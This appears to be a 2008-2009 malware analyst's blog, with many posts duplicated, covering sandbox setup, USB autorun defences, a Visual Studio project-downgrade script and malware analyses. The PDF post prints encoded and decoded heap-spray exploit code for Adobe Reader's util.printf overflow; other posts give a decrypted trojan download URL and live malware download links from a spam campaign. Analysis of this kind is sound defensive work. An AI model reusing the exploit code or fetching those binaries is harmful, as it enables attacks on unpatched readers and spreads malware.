http://www.krakowlabs.com/lof.html
Tuesday, April 07, 2009
Tuesday, March 10, 2009
Wednesday, February 04, 2009
ZeroWine sanbox
I was excited when I read this blog last week.
Yesterday, I downloaded the required files, but was very busy with other tasks.
Today, I was able to make it work, and here's the screenshot:
Sweet :)
Note:
Some minor edit:
In the blog, the author mentioned about:
"vi /etc/udev/rules.d/z25_persistent-net.rules"
I just followed what other reader did:
"delete the previous line of generated entry, i.e. eth0 and rename eth1 to eth0"
Today, I was able to make it work, and here's the screenshot:
Sweet :)
Note:
Some minor edit:
In the blog, the author mentioned about:
"vi /etc/udev/rules.d/z25_persistent-net.rules"
I just followed what other reader did:
"delete the previous line of generated entry, i.e. eth0 and rename eth1 to eth0"
Thursday, January 15, 2009
Dont mess with password stealer malware
When you're analyzing malware, make sure you're not connected online.
One time, I was analyzing a password-stealer malware, that (expectedly) collects cache passwords and other retrievable user accounts, before sending them to the presumably, hacker's server.
Gathered (read:hacked) credentials ranging from facebook, linkedin, banks, webmails, router and other accounts.
Take a look..you're user accounts might have been included:
One time, I was analyzing a password-stealer malware, that (expectedly) collects cache passwords and other retrievable user accounts, before sending them to the presumably, hacker's server.
Gathered (read:hacked) credentials ranging from facebook, linkedin, banks, webmails, router and other accounts.
Take a look..you're user accounts might have been included:
Tuesday, January 13, 2009
How To Disable USB autorun?
Some posted ways to disable usb autorun to avoid the pesky autorun malware.
Pick you choice:
http://support.microsoft.com/kb/823732
http://nick.brown.free.fr/blog/2007/10/memory-stick-worms.html
http://hack5.blogspot.com/2008/04/one-simple-solution-to-all-those-usb.html
http://blog.ashfame.com/2008/03/disable-usb-autorun-save-pc-usb-viruses/
http://www.sizlopedia.com/2008/03/18/disable-usb-autorun-to-save-pc-from-usb-viruses/
http://antivirus.about.com/od/securitytips/ht/autorun.htm
http://www.raymond.cc/blog/archives/2008/04/22/stop-windows-from-executing-instructions-found-in-autoruninf/
Pick you choice:
http://support.microsoft.com/kb/823732
http://nick.brown.free.fr/blog/2007/10/memory-stick-worms.html
http://hack5.blogspot.com/2008/04/one-simple-solution-to-all-those-usb.html
http://blog.ashfame.com/2008/03/disable-usb-autorun-save-pc-usb-viruses/
http://www.sizlopedia.com/2008/03/18/disable-usb-autorun-to-save-pc-from-usb-viruses/
http://antivirus.about.com/od/securitytips/ht/autorun.htm
http://www.raymond.cc/blog/archives/2008/04/22/stop-windows-from-executing-instructions-found-in-autoruninf/
Chromium comic
..its about google's crome browser's architecture, process isolation, yada yada!
Friday, January 02, 2009
How to clean virus infection?
Some "alternatives" on fighting malware infection:
> http://www.claymania.com/removal-trojan-adware.html
> http://www.malwarebytes.org/index.php
> http://www.pctipp.ch/index.cfm?pid=1411&pk=28470
> http://www.claymania.com/removal-trojan-adware.html
> http://www.malwarebytes.org/index.php
> http://www.pctipp.ch/index.cfm?pid=1411&pk=28470
VS2K8 toVS2K5
Not really into coding these days, so I dont know how to convert sln from VS2008 to VS2005, until I found this script from google code:
<----------------------
#! /bin/sh -e
# This script downgrades MSVC 2008 projects to MSVC 2005 projects, allowing
# people with MSVC 2005 to open them. Otherwise, MSVC 2005 simply refuses to
# open projects created with 2008. We run this as part of our release process.
# If you obtained the code direct from version control and you want to use
# MSVC 2005, you may have to run this manually. (Hint: Use Cygwin or MSYS.)
for file in *.sln; do
echo "downgrading $file..."
sed -i -re 's/Format Version 10.00/Format Version 9.00/g;
s/Visual Studio 2008/Visual Studio 2005/g;' $file
done
for file in *.vcproj; do
echo "downgrading $file..."
sed -i -re 's/Version="9.00"/Version="8.00"/g;' $file
done
# Yes, really, that's it.
<----------------------
Of course, there could be other ways, but, as simple as this?!? :)
<----------------------
#! /bin/sh -e
# This script downgrades MSVC 2008 projects to MSVC 2005 projects, allowing
# people with MSVC 2005 to open them. Otherwise, MSVC 2005 simply refuses to
# open projects created with 2008. We run this as part of our release process.
# If you obtained the code direct from version control and you want to use
# MSVC 2005, you may have to run this manually. (Hint: Use Cygwin or MSYS.)
for file in *.sln; do
echo "downgrading $file..."
sed -i -re 's/Format Version 10.00/Format Version 9.00/g;
s/Visual Studio 2008/Visual Studio 2005/g;' $file
done
for file in *.vcproj; do
echo "downgrading $file..."
sed -i -re 's/Version="9.00"/Version="8.00"/g;' $file
done
# Yes, really, that's it.
<----------------------
Of course, there could be other ways, but, as simple as this?!? :)
Tuesday, December 30, 2008
Koobface
I've traced and analyzed some variants of the infamous KoobFace worm, but I've seen this analysis from ThreatExpert pretty complete:
http://blog.threatexpert.com/2008/12/koobface-leaves-victims-black-spot.html
http://blog.threatexpert.com/2008/12/how-to-defeat-koobface.html
http://blog.threatexpert.com/2008/12/koobface-leaves-victims-black-spot.html
http://blog.threatexpert.com/2008/12/how-to-defeat-koobface.html
Saturday, November 15, 2008
simple pdf exploit analysis
simple steps in checking pdf for exploit:
1. open the file in hex viewer or any text editor/viewer. if the pdf has embedded script which is compressed, it can be checked by the FlateDecode string:
1. open the file in hex viewer or any text editor/viewer. if the pdf has embedded script which is compressed, it can be checked by the FlateDecode string:
3. use pdftk tool to uncompress the malicious script:
$ pdftk file.pdf output file.pdf.out uncompress
4. the file file.pdf.out now contains the decompressed script. browse the file to locate the (escaped) script:
5. extract the escaped text, and feed to your preferred tool to unescape the code.
Extracted text:
%76%61%72%20%73%63%63%73%20%3D%20%75%6E%65%73%63%61%70%65%28%74%68%69%73%2E%67%65%74%46%69%65%6C%64%28%27%74%65%78%74%27%29%2E%76%61%6C%75%65%29%3B%0D%0A%0D%0A%09%76%61%72%20%62%67%62%6C%20%3D%20%75%6E%65%73%63%61%70%65%28%22%25%75%30%41%30%41%22%2B%22%25%75%30%41%30%41%22%29%3B%0D%0A%09%76%61%72%20%73%6C%73%70%63%20%3D%20%32%30%20%2B%20%73%63%63%73%2E%6C%65%6E%67%74%68%3B%0D%0A%09%77%68%69%6C%65%28%62%67%62%6C%2E%6C%65%6E%67%74%68%20%3C%20%73%6C%73%70%63%29%20%62%67%62%6C%20%2B%3D%20%62%67%62%6C%3B%0D%0A%09%76%61%72%20%66%62%6C%6B%20%3D%20%62%67%62%6C%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%73%6C%73%70%63%29%3B%0D%0A%09%76%61%72%20%62%6C%6B%20%3D%20%62%67%62%6C%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%62%67%62%6C%2E%6C%65%6E%67%74%68%20%2D%20%73%6C%73%70%63%29%3B%0D%0A%09%77%68%69%6C%65%28%62%6C%6B%2E%6C%65%6E%67%74%68%20%2B%20%73%6C%73%70%63%20%3C%20%30%78%36%30%30%30%30%29%20%62%6C%6B%20%3D%20%62%6C%6B%20%2B%20%62%6C%6B%20%2B%20%66%62%6C%6B%3B%0D%0A%0D%0A%09%76%61%72%20%6D%6D%79%20%3D%20%6E%65%77%20%41%72%72%61%79%28%29%3B%0D%0A%09%66%6F%72%28%69%20%3D%20%30%3B%20%69%20%3C%20%31%32%30%30%3B%20%69%2B%2B%29%7B%20%6D%6D%79%5B%69%5D%20%3D%20%62%6C%6B%20%2B%20%73%63%63%73%20%7D%0D%0A%0D%0A%76%61%72%20%6E%6D%20%3D%20%31%32%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%31%38%3B%69%2B%2B%29%7B%20%6E%6D%20%3D%20%6E%6D%20%2B%20%22%39%22%3B%20%7D%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%32%37%36%3B%69%2B%2B%29%7B%20%6E%6D%20%3D%20%6E%6D%20%2B%20%22%38%22%3B%20%7D%0D%0A%0D%0A%75%74%69%6C%2E%70%72%69%6E%74%66%28%75%6E%65%73%63%61%70%65%28%22%22%2B%22%25%22%2B%22%32%35%25%33%34%25%22%2B%22%33%35%25%33%30%25%33%30%25%33%30%25%36%36%22%29%2C%20%6E%6D%29%3B%0D%0A%0D%0A%74%68%69%73%2E%63%6C%6F%73%65%44%6F%63%28%74%72%75%65%29%3B%0D%0A5.
the output will be decoded as below.
<------------------------------------------------------------------------------
var sccs = unescape(this.getField('text').value);
var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < slspc) bgbl += bgbl;
var fblk = bgbl.substring(0,slspc);
var blk = bgbl.substring(0,bgbl.length - slspc);
while(blk.length + slspc < 0x60000) blk = blk + blk + fblk;
var mmy = new Array();
for(i = 0; i < 1200; i++){ mmy[i] = blk + sccs }
var nm = 12;
for(i=0;i<18;i++){ nm = nm + "9"; }
for(i=0;i<276;i++){ nm = nm + "8"; }
util.printf(unescape(""+"%"+"25%34%"+"35%30%30%30%66"), nm);
this.closeDoc(true);
<------------------------------------------------------------------------------
if you're monitoring latest alerts, it will be familiar with you. its an exploit for PDF's util.printf discovered by coresecurity. see the details: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
Wednesday, October 29, 2008
Wednesday, October 22, 2008
quick check of trojan's downloaded file
Some bots and trojans are using simple encryption to download other component. When you trace malware, you might see some url to be downloaded, but when you manually fetch it, its nothing by a gibberish data. First they download a relatively small file say, ff.rar, from malicious web hosting site. The file is not actually a RAR achive but contains data that looks encrypted. But when try to decrypt it, the file may contain the actual link of the malicious file or component to be downloaded by the malware.
Example: ff.rar
00000000: 29 1A 61 35-63 64 65 74-2E 61 00 00-00 00 00 00 )?a5cdet.a
00000010: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00000020: 00 00 41 5D-5D 59 13 06-06 48 5A 4D-1F 5C 07 4A A]]Y???HZM?\•J
00000030: 46 44 06 43-43 06 4F 4F-07 4C 51 4C- FD?CC?OO•LQL
Your instinct will tell you that this could be the download URL, and that must be using http.
At offset 0x23 and 0x24 are the same bytes (5D) which could be decrypted to 'TT' of 'http'.
Hmm..applying simple math, 5d ^ X = 74 (74 is the hex value for 't'), so x = 29. Now lets try to decrypt it using that value as the key.
Using hiew, you can quickly decrypt the bytes using the value X=29 as the key
1. Open the file in hiew, hex mode. Position the cursor at offset 0
2. Press F3 (edit), then F8 (XOR). Put 29 hex as the XOR mask. Enter.
3. Pressing F8 will decrypt it similar below:
00000000: 00 33 48 1C-4A 4D 4C 5D-07 48 29 29-29 29 29 29 3H?JML]•H))))))
00000010: 29 29 29 29-29 29 29 29-29 29 29 29-29 29 29 29 ))))))))))))))))
00000020: 29 29 68 74-74 70 3A 2F-2F 61 73 64-36 75 2E 63 ))http://asd6u.c
00000030: 6F 6D 2F 6A-6A 2F 66 66-2E 65 78 65- om/jj/ff.exe
Now you have the actual link of the malware and you can manually wget it from the link hXXp://asd6u.com/jj/ff.exe
Example: ff.rar
00000000: 29 1A 61 35-63 64 65 74-2E 61 00 00-00 00 00 00 )?a5cdet.a
00000010: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00000020: 00 00 41 5D-5D 59 13 06-06 48 5A 4D-1F 5C 07 4A A]]Y???HZM?\•J
00000030: 46 44 06 43-43 06 4F 4F-07 4C 51 4C- FD?CC?OO•LQL
Your instinct will tell you that this could be the download URL, and that must be using http.
At offset 0x23 and 0x24 are the same bytes (5D) which could be decrypted to 'TT' of 'http'.
Hmm..applying simple math, 5d ^ X = 74 (74 is the hex value for 't'), so x = 29. Now lets try to decrypt it using that value as the key.
Using hiew, you can quickly decrypt the bytes using the value X=29 as the key
1. Open the file in hiew, hex mode. Position the cursor at offset 0
2. Press F3 (edit), then F8 (XOR). Put 29 hex as the XOR mask. Enter.
3. Pressing F8 will decrypt it similar below:
00000000: 00 33 48 1C-4A 4D 4C 5D-07 48 29 29-29 29 29 29 3H?JML]•H))))))
00000010: 29 29 29 29-29 29 29 29-29 29 29 29-29 29 29 29 ))))))))))))))))
00000020: 29 29 68 74-74 70 3A 2F-2F 61 73 64-36 75 2E 63 ))http://asd6u.c
00000030: 6F 6D 2F 6A-6A 2F 66 66-2E 65 78 65- om/jj/ff.exe
Now you have the actual link of the malware and you can manually wget it from the link hXXp://asd6u.com/jj/ff.exe
Friday, October 17, 2008
Reverse Engineering Links
Gathered from different sources (eg. my own bookmarks, forum, blog, etc):
http://www.openrce.org
http://woodmann.net/collaborative/tools/index.php/Category:Hardware_Reversing_Tools
http://www.woodmann.com/crackz/index.html
http://www.woodmann.com/forum/index.php
http://www.codebreakers-journal.com/
http://www.tuts4you.com/download.php?list.17
http://www.tuts4you.com/
http://www.exetools.com/
http://ap0x.jezgra.net/
http://www.crackmes.de/
http://www.reverse-engineering.info/
http://www.w00zl3.net/
http://korupt.wordpress.com/
http://www.reteam.org/
http://www.reconstructer.org
http://www.antirootkit.com
http://www.rootkit.com
http://evilcry.netsons.org
http://evilcodecave.wordpress.com
http://offensivecomputing.net/
http://zairon.wordpress.com/
http://www.ivanlef0u.tuxfamily.org/
http://arteam.accessroot.com/
http://uninformed.org/
http://dvlabs.tippingpoint.com/
http://www.matasano.com/log/category/reversing/
http://reversengineering.wordpress.com/
http://indefinitestudies.wordpress.com/2008/09/25/automatic-unpacking/
http://www.quequero.org/Reversing
http://www.codeproject.com/KB/cpp/funccaller.aspx
http://www.datarescue.com/laboratory/
http://www.nynaeve.net
http://www.datasecurity-event.com/downloads.html
http://xchg.info/ARTeam/Tutorials/
http://www.reverse-engineering.net/
http://www.reversing.be/
Others:
http://www.intel.com/products/processor/manuals/
http://www.openrce.org
http://woodmann.net/collaborative/tools/index.php/Category:Hardware_Reversing_Tools
http://www.woodmann.com/crackz/index.html
http://www.woodmann.com/forum/index.php
http://www.codebreakers-journal.com/
http://www.tuts4you.com/download.php?list.17
http://www.tuts4you.com/
http://www.exetools.com/
http://ap0x.jezgra.net/
http://www.crackmes.de/
http://www.reverse-engineering.info/
http://www.w00zl3.net/
http://korupt.wordpress.com/
http://www.reteam.org/
http://www.reconstructer.org
http://www.antirootkit.com
http://www.rootkit.com
http://evilcry.netsons.org
http://evilcodecave.wordpress.com
http://offensivecomputing.net/
http://zairon.wordpress.com/
http://www.ivanlef0u.tuxfamily.org/
http://arteam.accessroot.com/
http://uninformed.org/
http://dvlabs.tippingpoint.com/
http://www.matasano.com/log/category/reversing/
http://reversengineering.wordpress.com/
http://indefinitestudies.wordpress.com/2008/09/25/automatic-unpacking/
http://www.quequero.org/Reversing
http://www.codeproject.com/KB/cpp/funccaller.aspx
http://www.datarescue.com/laboratory/
http://www.nynaeve.net
http://www.datasecurity-event.com/downloads.html
http://xchg.info/ARTeam/Tutorials/
http://www.reverse-engineering.net/
http://www.reversing.be/
Others:
http://www.intel.com/products/processor/manuals/
Tuesday, October 07, 2008
VS2005 compiled exe error
The following error shows when you transferred or copied your VS2005 compiled program to other machine. This is I think
c:\test> BlueFish.exe
This application has failed to start because the application configuration is incorrect. Reinstalling the application may fix this problem.
Similar problem discussion about SxS (side-by-side) issue can be found here.
Another similar discussion I found from this link.
Anyway, I tried changing settings in my VS2005 which just worked fine, but not sure if its the correct solution. Here;s the settings as screenshots:
c:\test> BlueFish.exe
This application has failed to start because the application configuration is incorrect. Reinstalling the application may fix this problem.
Similar problem discussion about SxS (side-by-side) issue can be found here.
Another similar discussion I found from this link.
Anyway, I tried changing settings in my VS2005 which just worked fine, but not sure if its the correct solution. Here;s the settings as screenshots:
Wednesday, September 24, 2008
Monday, September 01, 2008
BGP security hole
after the noisy DNS vulnerability, here comes another big time security loophole that can take down the internet in less than an hour, or used in malicious way such as eavesdropping - the BGP weakness.
Thursday, August 28, 2008
Tip Of The Day - Virtual Drive
"OnLineGames" trojans are one of todays most popular malware, occupying large chunk of ItW( In-The-Wild) list. Note: Some malware, like Autorun are also behaving similar to OnlineGames trojan. They are designed to steal confidential information from online gamers particularly addicted to massively multiplayer online role-playing game (MMORPG) types of games.
One particular behavior of this malware family is its capability to spread to all hard drives including USB. This made it possible for this malware to be carried out somewhere including outer space . Its just a matter of time that someone could write virus that could sabotage some of the most critical infrastractures that affect our lives. Scary isn't it?
Typically, we do static analysis with Hiew or Ida. Then dynamic analysis to analyze viruses. Static analysis is basically just browsing the structures of the file, disassembly codes and trying to understand the overall behavior. Some strings can also give help of its nature, like my previous post.
Dynamic analysis can be divided into 2 parts: (a) behavioral analysis by running the malware in a sanbox.
and (b) tracing, running the malware under the debugger, watching the behavior by breaking to some predetermined
part of the code, and supplementing other additional "baits" (eg. required files, proces, etc). In tracing mode, you have the choice to examine only parts of the code.
Example: how the malware gather email address for spamming, some decryption routines, and other algorithmic code that may require special attention to fully understand the malware, or other code that you need to verify because other analysis say something that you didnot observe.
Ill show some practical tips that can help you in analyzing (malware in general and ) OnlineGames trojan through behavioral analysis, that I can roughly describe as follows:
0. Most of them are working fine on VMware, so using VMware is a good idea to analyze malware, especially if you analyze large volume of malware due to VMwar's snapshot capabilities. Reverting to your "sandbox" snapshot is way much faster than restoring real machine by using, say GHOST.
1. Use lightweight network/packet sniffer to capture the traffic as most of them are downloading components from remote locations. Im using my own tool pcaps32:
pcaps32 in action
This is particularly useful to check the inbound/outbound traffic generated by the malware such as communication with its C&C, download websites, spammed emails, traffic redirection or if the contacted IP is unreachable or not.
2. Process viewer program like process explorer sysinternals, to see process activities like hiddenly spawned ie process, etc. Pretty obvious.
3. Registry and file monitoring programs are obviously valuable to easily spot the modification in the system after running the malware.
4. And last but not the least, Virtual Hard drive, thats why the subject name :) As virus analyst, you have to be quick and resourceful in utilizing the right tools. One time, while analyzing "OnlineGames" trojan, I thought I've whether its mutating for very infection. Onlinegames are known to drop INF file and a copy of itself (or other components) to all accessible hard drives. So the trick is to provide the trojan more accessible hard drives to see other behavior to some extent. This is essential for us to know if the dropped files to other hard drives are mutating or polymorphic. But my VMware setup has only one drive and I didnt want to resetup just for this malware.
For this purpose, I tried Virtual Hard Drive software from farstone. So grab a trial version and install it to your sandbox machine. Creating a virtual hard drive is easy. Just run "Virtual Hard Drive Pro" from Start->Programs->Virtual Hard Drive Pro. A wizard will guide you to create virtual hard drive:
Just specify the drive letter for your new hard drive and the allocated space for it. The licensed version I believe would allow you to create more virtual hard drives.
Now you are ready to run the malware. This is where the behavioral analysis commence.
OK. Lets say youre done with the analysis, and would like to check the effect of the virtual hard drive (VHD). Just goto your bait hard drive and check for system modification, which is usually dropped or copy of the malicious program. Take note that some monitoring program will not be able to catch added programs to the VHD, so will manually check it.
Some variants may turn off the "show hidden file" option via registry, but you can use "dir /ah" or "attrib *" if you know the drop point, usually at the root dir similar below:
It will help the analyst to verify if the malware is polymorphic or mutating on every infection, and so the analyst can provide better signature coverage against each variant or family.
On my next posts, I will present how to analyze complex malware that would require tracing and hacking the malware code. Stay tuned.
One particular behavior of this malware family is its capability to spread to all hard drives including USB. This made it possible for this malware to be carried out somewhere including outer space . Its just a matter of time that someone could write virus that could sabotage some of the most critical infrastractures that affect our lives. Scary isn't it?
Typically, we do static analysis with Hiew or Ida. Then dynamic analysis to analyze viruses. Static analysis is basically just browsing the structures of the file, disassembly codes and trying to understand the overall behavior. Some strings can also give help of its nature, like my previous post.
Dynamic analysis can be divided into 2 parts: (a) behavioral analysis by running the malware in a sanbox.
and (b) tracing, running the malware under the debugger, watching the behavior by breaking to some predetermined
part of the code, and supplementing other additional "baits" (eg. required files, proces, etc). In tracing mode, you have the choice to examine only parts of the code.
Example: how the malware gather email address for spamming, some decryption routines, and other algorithmic code that may require special attention to fully understand the malware, or other code that you need to verify because other analysis say something that you didnot observe.
Ill show some practical tips that can help you in analyzing (malware in general and ) OnlineGames trojan through behavioral analysis, that I can roughly describe as follows:
0. Most of them are working fine on VMware, so using VMware is a good idea to analyze malware, especially if you analyze large volume of malware due to VMwar's snapshot capabilities. Reverting to your "sandbox" snapshot is way much faster than restoring real machine by using, say GHOST.
1. Use lightweight network/packet sniffer to capture the traffic as most of them are downloading components from remote locations. Im using my own tool pcaps32:
pcaps32 in action
This is particularly useful to check the inbound/outbound traffic generated by the malware such as communication with its C&C, download websites, spammed emails, traffic redirection or if the contacted IP is unreachable or not.2. Process viewer program like process explorer sysinternals, to see process activities like hiddenly spawned ie process, etc. Pretty obvious.
3. Registry and file monitoring programs are obviously valuable to easily spot the modification in the system after running the malware.
4. And last but not the least, Virtual Hard drive, thats why the subject name :) As virus analyst, you have to be quick and resourceful in utilizing the right tools. One time, while analyzing "OnlineGames" trojan, I thought I've whether its mutating for very infection. Onlinegames are known to drop INF file and a copy of itself (or other components) to all accessible hard drives. So the trick is to provide the trojan more accessible hard drives to see other behavior to some extent. This is essential for us to know if the dropped files to other hard drives are mutating or polymorphic. But my VMware setup has only one drive and I didnt want to resetup just for this malware.
For this purpose, I tried Virtual Hard Drive software from farstone. So grab a trial version and install it to your sandbox machine. Creating a virtual hard drive is easy. Just run "Virtual Hard Drive Pro" from Start->Programs->Virtual Hard Drive Pro. A wizard will guide you to create virtual hard drive:
Just specify the drive letter for your new hard drive and the allocated space for it. The licensed version I believe would allow you to create more virtual hard drives.
Now you are ready to run the malware. This is where the behavioral analysis commence.
OK. Lets say youre done with the analysis, and would like to check the effect of the virtual hard drive (VHD). Just goto your bait hard drive and check for system modification, which is usually dropped or copy of the malicious program. Take note that some monitoring program will not be able to catch added programs to the VHD, so will manually check it.
Some variants may turn off the "show hidden file" option via registry, but you can use "dir /ah" or "attrib *" if you know the drop point, usually at the root dir similar below:
It will help the analyst to verify if the malware is polymorphic or mutating on every infection, and so the analyst can provide better signature coverage against each variant or family.
On my next posts, I will present how to analyze complex malware that would require tracing and hacking the malware code. Stay tuned.
Wednesday, August 27, 2008
Tip Of The Day - AutoHotkey malware
Yesterday, I found a piece of malware to analyze. I checked the file structure and it looks like a UPX packed executable (eg. from section names, entry point disassembly and even some signature checker tools).
Original file
Unpacked version
UPX v3.0 marker
So I grabbed a copy of upx.exe that can decompress the file which says its UPX version 3.00. Everything was ok and the file was successfully unpacked. So I opened the unpacked version to HIEW and check the entry point again.
Entry point disassembly in Hiew
Entry point disassembly in Ida
From its disassembly, it really is unpacked and you can tell that it looks the normal entry point of a program. Maybe if you're analyzing malware for a while, you can tell this based from the first API calls, etc. Most of the time its game over..but sometimes, it gets even more.
So I ran the file on my sandbox machine and wait for some interesting behavior. But nothing happened. So I opened it again and started to trace. But hey, I forgot to check the strings that can lead me somewhere. I've browsed the binary under Hiew and started looking for some strings.
"AutoHotkey" strings
Indeed, there were some interesting strings (Assembly Manifest) inside the binary.
With that in mind, its most likely an autohotkey script that is converted into executable, just like autoit, remember? Hmmm...so I opened my browser and search for "autohotkey". Viola! From its website it says:
"Convert any script into an EXE file that can be run on computers that don't have AutoHotkey installed."
The EXE is actually a hyperlink to download its decompiler ahk2exe. Download it and you can revert back the exe to its original script format, that can be opened on any text viewer/editor to view the contents. The decompiled script is pretty much straightforward and it would make your life 10x faster to analyze the file.
Then thats game over!
Decompiled script
Check the AV detections in VT
Conclusion: People can now easily create malware without learning ASM or C by just learning simple syntax from scripting languages like autohotkey then convert it into executable format.
Original file
Unpacked version
UPX v3.0 marker
Entry point disassembly in Hiew
Entry point disassembly in IdaSo I ran the file on my sandbox machine and wait for some interesting behavior. But nothing happened. So I opened it again and started to trace. But hey, I forgot to check the strings that can lead me somewhere. I've browsed the binary under Hiew and started looking for some strings.
"AutoHotkey" stringsIndeed, there were some interesting strings (Assembly Manifest) inside the binary.
With that in mind, its most likely an autohotkey script that is converted into executable, just like autoit, remember? Hmmm...so I opened my browser and search for "autohotkey". Viola! From its website it says:
"Convert any script into an EXE file that can be run on computers that don't have AutoHotkey installed."
The EXE is actually a hyperlink to download its decompiler ahk2exe. Download it and you can revert back the exe to its original script format, that can be opened on any text viewer/editor to view the contents. The decompiled script is pretty much straightforward and it would make your life 10x faster to analyze the file.
Then thats game over!
Decompiled scriptConclusion: People can now easily create malware without learning ASM or C by just learning simple syntax from scripting languages like autohotkey then convert it into executable format.
Tuesday, August 26, 2008
Sunday, August 24, 2008
More Paris Hilton Malware..
My inbox has several emails purportedly a video of Paris Hilton.
The email is a simple html that contains link to a photo (Paris), but when you click the hyperlink enticing the users to view the video, it will download an EXE file from another remote location.
An example of the email is below:
And the email body in text mode is similar below:
Highlighted in red is the actual location of the executable file. You can see the links of the photo is different from the location of the binary file.
Some of the download links are as follows:
http://patuash.yoyo.pl/video_4.exe
http://www.odakoptik.com.tr/video_3.exe
http://baupol.net/video_1.exe
Example output from VT is here.
The email is a simple html that contains link to a photo (Paris), but when you click the hyperlink enticing the users to view the video, it will download an EXE file from another remote location.
An example of the email is below:
And the email body in text mode is similar below:
Highlighted in red is the actual location of the executable file. You can see the links of the photo is different from the location of the binary file.Some of the download links are as follows:
http://patuash.yoyo.pl/video_4.exe
http://www.odakoptik.com.tr/video_3.exe
http://baupol.net/video_1.exe
Example output from VT is here.
Subscribe to:
Comments (Atom)
Posts
